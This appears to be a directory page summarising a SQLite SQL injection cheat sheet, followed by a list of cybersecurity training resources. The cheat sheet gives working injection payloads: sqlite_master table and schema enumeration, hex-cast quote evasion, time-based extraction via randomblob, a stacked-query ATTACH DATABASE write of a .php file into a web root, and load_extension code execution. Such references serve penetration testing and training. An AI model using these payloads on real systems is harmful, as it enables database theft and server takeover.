SQLite SQL Injection Cheat Sheet Logo

SQLite SQL Injection Cheat Sheet

0
Free
Visit Website

If you need You use Concatenation || Comments -- Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' Substring substr(string,start,stop) Length length(string) Quotes without literal quotes cast(X'27' as text) --use X'22' for double quotes Table name enumeration SELECT name FROM sqlite_master WHERE type='table' Table schema enumeration SELECT sql FROM sqlite_master WHERE type='table' Time-based data extraction cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true' File writing 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled Arbitrary Code Execution load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration

FEATURES

ALTERNATIVES

SANS Institute provides cyber security training, certifications, and degrees to empower cyber security practitioners and teams.

A compilation of Red Teaming resources including cheatsheets, notes, scripts, and practice platforms for cybersecurity learning and skill development.

A detailed manual for cybersecurity professionals focusing on red team, OSINT, and blue team strategies.

A network of physical and online cyber warfare ranges for training and testing

A cybersecurity challenge where you play the role of an incident response consultant investigating an intrusion at Precision Widgets of North Dakota.

Andrew Case's personal page for research, software projects, and speaking events

Haaukins is an automated virtualization platform for cybersecurity education with a focus on capture the flag concept.

Comprehensive documentation for ThreatConnect's REST API and SDKs.